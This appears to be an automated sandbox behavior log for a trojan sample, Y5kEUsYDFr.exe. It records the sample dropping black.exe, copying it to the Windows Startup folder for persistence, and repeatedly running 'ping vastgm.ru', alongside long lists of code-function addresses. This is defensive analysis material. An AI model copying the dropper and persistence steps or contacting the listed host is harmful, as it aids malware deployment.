Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeFile created: C:\Windows\SysWOW64\jz2envuw.2rt.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeFile deleted: C:\Windows\SysWOW64\jz2envuw.2rt.exeJump to behavior
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9C5E240_2_00007FF6CA9C5E24
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9E1F200_2_00007FF6CA9E1F20
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9ECE880_2_00007FF6CA9ECE88
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9DA4AC0_2_00007FF6CA9DA4AC
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9E34840_2_00007FF6CA9E3484
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9EB1900_2_00007FF6CA9EB190
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9F07540_2_00007FF6CA9F0754
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9CF9300_2_00007FF6CA9CF930
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9D49280_2_00007FF6CA9D4928
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9F8C1C0_2_00007FF6CA9F8C1C
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9D5B600_2_00007FF6CA9D5B60
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9E4B980_2_00007FF6CA9E4B98
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9DBB900_2_00007FF6CA9DBB90
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9E39640_2_00007FF6CA9E3964
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9DC96C0_2_00007FF6CA9DC96C
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9F89A00_2_00007FF6CA9F89A0
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CAA05AF80_2_00007FF6CAA05AF8
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9D1A480_2_00007FF6CA9D1A48
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9C1AA40_2_00007FF6CA9C1AA4
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9E2AB00_2_00007FF6CA9E2AB0
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9FFA940_2_00007FF6CA9FFA94
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CAA020800_2_00007FF6CAA02080
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9E8DF40_2_00007FF6CA9E8DF4
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9F07540_2_00007FF6CA9F0754
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9E2D580_2_00007FF6CA9E2D58
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9DAF180_2_00007FF6CA9DAF18
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9E53F00_2_00007FF6CA9E53F0
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9DB5340_2_00007FF6CA9DB534
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9E21D00_2_00007FF6CA9E21D0
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9DF1800_2_00007FF6CA9DF180
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9CC2F00_2_00007FF6CA9CC2F0
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9CA3100_2_00007FF6CA9CA310
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9D126C0_2_00007FF6CA9D126C
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9C72880_2_00007FF6CA9C7288
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9C48400_2_00007FF6CA9C4840
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9FC8380_2_00007FF6CA9FC838
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CAA025500_2_00007FF6CAA02550
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9C76C00_2_00007FF6CA9C76C0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_00CDADD81_2_00CDADD8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_00CDA1881_2_00CDA188
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_00CDBD001_2_00CDBD00
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_00CDC6E01_2_00CDC6E0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_00CDA6A81_2_00CDA6A8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_00CDAA501_2_00CDAA50
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_00CDEA001_2_00CDEA00
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_00CDE6281_2_00CDE628
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_00CDB7D01_2_00CDB7D0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_00CDD3A81_2_00CDD3A8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_00CD63011_2_00CD6301
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_00CDBB201_2_00CDBB20
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_00CDE0981_2_00CDE098
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_00CDADC81_2_00CDADC8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_00CDC5E81_2_00CDC5E8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_00CDA1781_2_00CDA178
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_00CDA6981_2_00CDA698
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_00CDE6181_2_00CDE618
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023A1B181_2_023A1B18
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023A13101_2_023A1310
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023ACBA81_2_023ACBA8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023A53A01_2_023A53A0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023A0F981_2_023A0F98
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023A7BC01_2_023A7BC0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023A58301_2_023A5830
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023A74201_2_023A7420
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023AA4081_2_023AA408
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023AD0501_2_023AD050
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023A08501_2_023A0850
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023A704A1_2_023A704A
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023A78B01_2_023A78B0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023A65001_2_023A6500
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023A1D701_2_023A1D70
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023AD5B01_2_023AD5B0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023A21F01_2_023A21F0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023A86881_2_023A8688
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023AE3081_2_023AE308
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023A7F011_2_023A7F01
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023A8F781_2_023A8F78
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023ACB981_2_023ACB98
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023AA3F91_2_023AA3F9
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023A7BD01_2_023A7BD0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023A083F1_2_023A083F
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023A74301_2_023A7430
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023AAC311_2_023AAC31
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023A98101_2_023A9810
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023A70581_2_023A7058
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023AE0501_2_023AE050
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023A9CA01_2_023A9CA0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023AE8E21_2_023AE8E2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023A21E01_2_023A21E0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023D34C81_2_023D34C8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023D01D01_2_023D01D0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023D01C31_2_023D01C3
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023D44301_2_023D4430
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023D44401_2_023D4440
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023D8C381_2_023D8C38
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023D8C481_2_023D8C48
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023D53181_2_023D5318
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023D51881_2_023D5188
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023D36B01_2_023D36B0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023D36A01_2_023D36A0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023D77291_2_023D7729
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023D1FB01_2_023D1FB0
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_0253AA507_2_0253AA50
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_0253EA007_2_0253EA00
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_0253BB207_2_0253BB20
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_0253A1887_2_0253A188
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_025311B87_2_025311B8
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_0253E6287_2_0253E628
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_0253C6E07_2_0253C6E0
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_0253A6A87_2_0253A6A8
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_0253B7D07_2_0253B7D0
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_0253BD007_2_0253BD00
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_0253ADD87_2_0253ADD8
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_0253E0987_2_0253E098
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_0253A1787_2_0253A178
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_025311A87_2_025311A8
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_0253E6187_2_0253E618
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_0253A6987_2_0253A698
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_0253ADC87_2_0253ADC8
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_0253C5E87_2_0253C5E8
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BA58307_2_04BA5830
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BA74207_2_04BA7420
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BAA4087_2_04BAA408
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BAD0507_2_04BAD050
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BA08507_2_04BA0850
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BA704A7_2_04BA704A
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BAD5B07_2_04BAD5B0
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BA21F07_2_04BA21F0
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BA65007_2_04BA6500
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BA1D707_2_04BA1D70
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BACBA87_2_04BACBA8
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BA53A07_2_04BA53A0
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BA0F987_2_04BA0F98
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BA7BC07_2_04BA7BC0
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BA1B187_2_04BA1B18
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BA13107_2_04BA1310
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BA78B07_2_04BA78B0
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BA9CA07_2_04BA9CA0
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BAE8E27_2_04BAE8E2
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BA083F7_2_04BA083F
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BA74307_2_04BA7430
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BAAC317_2_04BAAC31
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BA58207_2_04BA5820
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BA98107_2_04BA9810
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BA70587_2_04BA7058
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BAE0507_2_04BAE050
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BAD5A17_2_04BAD5A1
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BA21E07_2_04BA21E0
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BA86887_2_04BA8688
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BACB987_2_04BACB98
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BA53927_2_04BA5392
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BAA3F97_2_04BAA3F9
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BA7BD07_2_04BA7BD0
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BAE3087_2_04BAE308
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BA7F017_2_04BA7F01
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BA8F787_2_04BA8F78
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BD34C87_2_04BD34C8
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BD44307_2_04BD4430
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BD44407_2_04BD4440
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BD01D07_2_04BD01D0
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BD01C07_2_04BD01C0
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BD36B07_2_04BD36B0
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BD36A07_2_04BD36A0
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BD51887_2_04BD5188
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BD71E17_2_04BD71E1
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BD53187_2_04BD5318
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BD7E887_2_04BD7E88
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BD1FB07_2_04BD1FB0
Source: Y5kEUsYDFr.exe, 00000000.00000003.1668931650.0000017ACD921000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenametaskill.exe0 vs Y5kEUsYDFr.exe
Source: classification engineClassification label: mal100.troj.adwa.evad.winEXE@42/41@3/3
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9CB6D8 GetLastError,FormatMessageW,LocalFree,0_2_00007FF6CA9CB6D8
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9E8624 FindResourceExW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00007FF6CA9E8624
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\black.exeJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5356:120:WilError_03
Source: C:\Users\user\AppData\Roaming\black.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:496:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4448:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2284:120:WilError_03
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0Jump to behavior
Source: Y5kEUsYDFr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeFile read: C:\Windows\win.iniJump to behavior
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Y5kEUsYDFr.exeReversingLabs: Detection: 47%
Source: Y5kEUsYDFr.exeVirustotal: Detection: 60%
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeFile read: C:\Users\user\Desktop\Y5kEUsYDFr.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\Y5kEUsYDFr.exe "C:\Users\user\Desktop\Y5kEUsYDFr.exe"
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping vastgm.ru
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping vastgm.ru
Source: unknownProcess created: C:\Users\user\AppData\Roaming\black.exe "C:\Users\user\AppData\Roaming\black.exe"
Source: C:\Users\user\AppData\Roaming\black.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping vastgm.ru
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping vastgm.ru
Source: unknownProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1644,i,11227877826786957155,3609580182791793806,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping vastgm.ru
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping vastgm.ru
Source: C:\Users\user\AppData\Roaming\black.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping vastgm.ru
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping vastgm.ru
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping vastgm.ruJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping vastgm.ruJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping vastgm.ruJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping vastgm.ruJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping vastgm.ruJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping vastgm.ru
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1644,i,11227877826786957155,3609580182791793806,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping vastgm.ru
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping vastgm.ru
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeSection loaded: dxgidebug.dllJump to behavior
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeSection loaded: riched20.dllJump to behavior
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeSection loaded: usp10.dllJump to behavior
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeSection loaded: msls31.dllJump to behavior
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeSection loaded: kernel.appcore.dllJump to behavior
